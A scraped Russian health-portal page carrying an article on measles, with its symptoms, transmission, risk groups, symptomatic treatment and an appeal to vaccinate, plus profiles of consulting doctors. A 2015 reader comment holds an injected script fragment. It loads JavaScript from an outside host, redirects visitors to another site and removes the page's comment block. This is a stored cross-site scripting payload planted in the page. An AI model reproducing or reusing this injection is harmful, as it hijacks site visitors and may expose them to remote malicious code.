Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Бой за самых маленьких: б...  >>  Бой за самых маленьких: борьба с эпидемией кори
 
Обратная связь
 

Бой за самых маленьких: борьба с эпидемией кори

Размер шрифта
19 февраля 2012 10:00
  • google_analytics: false
  • Нравится

Наш разговор о кори – опасном вирусном заболевании, которым очень легко заразиться, если нет прививки, ведь индекс заразности кори составляет почти 100 %. Эта коварная болезнь может вызвать осложнения, самые серьезные из которых - отек легких и коревой энцефалит, что особенно опасно у маленьких детей.

1

Корь – острое инфекционное вирусное заболевание с высоким уровнем восприимчивости, т.к. его передача осуществляется воздушно-капельным путем. Возбудителем кори является РНК-вирус, который малоустойчив во внешней среде и быстро погибает от воздействия физических и химических факторов: при кипячении, обработке дезинфицирующими средствами, облучении и т.д.

Симптомы

Заболевание протекает с высокой температурой (до 40,5°C), воспалением слизистых оболочек полости рта и верхних дыхательных путей, конъюнктивитом и характерной пятнисто-папулезной сыпью на коже, а также общей интоксикацией, сопровождающейся слабостью.

Если вы находитесь рядом с больным человеком, то вирус кори может подстерегать вас везде, потому что главный путь передачи возбудителя кори - воздушно-капельный. Статистика утверждает, что этот вирус действует без промахов и дает 100-процентную гарантию, что вы заболеете корью, если:

  • вы не болели корью раньше;
  • вы не вакцинированы;
  • после последней вакцинации прошло более 10 лет.

Эти люди и составляют группу риска по заболеваемости корью.

Как лечить корь

Препаратов для специфического лечения кори нет, поэтому оно сводится только к симптоматической терапии. Каждый симптом лечится своим средством, и врач, как никто другой знает об этом.

Как не заболеть

Единственной возможностью не заболеть корью на сегодняшний день является создание активного иммунитета с помощью вакцинации живой коревой вакциной.

Не бойтесь прививок и не относитесь к ним, как к процедуре, без которой можно обойтись. Тем более, в случае с корью. Берегите себя и своих малышей!
 


Сюжет по теме:
Вспышка кори. Как спасти детей и не заболеть самим  

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:54

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.